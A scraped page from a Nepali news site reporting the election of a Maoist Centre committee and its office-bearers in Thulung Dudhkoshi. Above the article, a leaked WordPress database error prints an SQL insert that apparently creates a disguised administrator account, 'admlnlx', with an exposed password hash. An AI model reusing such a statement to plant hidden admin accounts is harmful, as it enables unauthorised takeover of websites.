WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJlcaEM2ANX2De0oTrQ.S6EY.otLe20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 05:39:04', '', 'admlnlx', 'admlnlx')

नेकपा माओबादी थुलुङ दुधकोशिको अध्यक्षमा धनश्याम – Gaule Khabar

नेकपा माओबादी थुलुङ दुधकोशिको अध्यक्षमा धनश्याम

नेकपा माओबादी थुलुङ दुधकोशिको अध्यक्षमा धनश्याम

काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिका नेकपा माओवादी केन्द्र समितिको अध्यक्षमा घनश्याम नेपाली चयन हुनुभएको छ । पार्टीको प्रथम ऐतिहासिक गाउँपालिका सम्मेलन अन्र्तगत नेपालीको अध्यक्षतामा ५५ सदस्यीय पालिका समिति सर्वसहमत चयन भएको हो ।

समितिको उपाध्यक्षहरुमा रामसंर्घष किराती, बुद्धिराज राई र टेक बहादुर बस्नेत, सचिवमा रामकिरण राई, सह–सचिवमा टिका खत्री केसी र कोषअध्यक्षमा ललित बहादुर राई चयन हुनुभएको नवनिर्वाचित सचिव रामकिरण राईले जानकारी दिए ।

थुलुङ दुधकोशी गाउँपालिका मुक्लीको सभाहलमा सम्पन्न कार्यक्रममा नेकपा माओवादी केन्द्र जिल्ला समन्वय समिति सोलुखुम्बुका इन्चार्ज तथा जिल्लाका संघिय सांसद हेम कुमार राई ‘सुरवीर’, पार्टीका जिल्ला समन्वय समिति अध्यक्ष गोम्बु शेर्पा ‘कज्र्याङ’, सचिव तथा थुलुङ दुधकोशी गाउँपालिका अध्यक्ष असिम राई, प्रदेश समिति सदस्य हिमाल गिरीसहित अन्य नेता तथा कार्यकर्ताहरुको उपस्थिती रहेको थियो ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका